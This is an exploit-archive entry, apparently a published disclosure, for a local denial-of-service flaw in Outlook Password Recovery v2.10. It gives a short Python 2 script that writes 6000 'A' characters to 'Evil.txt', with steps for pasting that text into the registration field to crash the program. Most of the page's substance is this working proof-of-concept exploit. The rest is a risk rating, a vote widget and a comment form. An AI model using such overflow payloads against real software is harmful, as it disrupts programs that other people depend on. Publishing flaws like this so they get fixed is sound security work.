Outlook Password Recovery 2.10 Denial Of Service

2019.08.29

Credit: Velayutham Selvaraj

Risk: Medium

Local: Yes

Remote: No

CVE: N/A

CWE: N/A

#Exploit Title: Outlook Password Recovery v2.10 Denial of Service Exploit
# Date: 16.08.2019
# Vendor Homepage:https://www.top-password.com/
# Software Link: https://www.top-password.com/outlook-password-recovery.html
# Exploit Author: Velayutham Selvaraj & Praveen Thiyagarayam (TwinTech Solutions)
# Tested Version: v2.10
# Tested on: Windows 7 x64
# Windows XP SP3
# 1.- Run python code :Outlook Password Recovery.py
# 2.- Open EVIL.txt and copy content to clipboard
# 3.- Open OUTLOOK Password Recovery and Click 'EnterKey'
# 4.- Paste the content of EVIL.txt into the Field: 'User Name and
Registration Code'
# 5.- Click 'OK' and you will see a crash.
#!/usr/bin/env python
buffer = "\x41" * 6000
try:
f=open("Evil.txt","w")
print "[+] Creating %s bytes evil payload.." %len(buffer)
f.write(buffer)
f.close()
print "[+] File created!"
except:
print "File cannot be created"

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Outlook Password Recovery 2.10 Denial Of Service

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.